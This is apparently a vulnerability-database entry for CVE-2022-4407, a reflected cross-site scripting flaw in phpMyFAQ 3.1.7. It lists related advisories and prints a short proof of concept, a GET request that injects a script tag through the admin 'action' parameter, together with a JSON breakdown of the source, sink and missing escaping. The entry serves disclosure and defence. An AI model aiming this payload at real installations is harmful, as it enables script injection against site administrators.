| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Reflect Cross Site Scripting | 26 Nov 202214:30 | ā | huntr | |
| CVE-2022-4407 | 11 Dec 202215:15 | ā | attackerkb | |
| CVE-2022-4407 | 11 Dec 202218:20 | ā | circl | |
| phpMyFAQ č·Øē«čę¬ę¼ę“ | 11 Dec 202200:00 | ā | cnnvd | |
| CVE-2022-4407 | 11 Dec 202200:00 | ā | cve | |
| CVE-2022-4407 Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq | 11 Dec 202200:00 | ā | cvelist | |
| phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) | 16 Apr 202500:00 | ā | exploitdb | |
| EUVD-2022-7603 | 3 Oct 202520:07 | ā | euvd | |
| phpMyFAQ vulnerable to Cross-site Scripting | 11 Dec 202215:30 | ā | github | |
| CVE-2022-4407 | 11 Dec 202215:15 | ā | nvd |
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation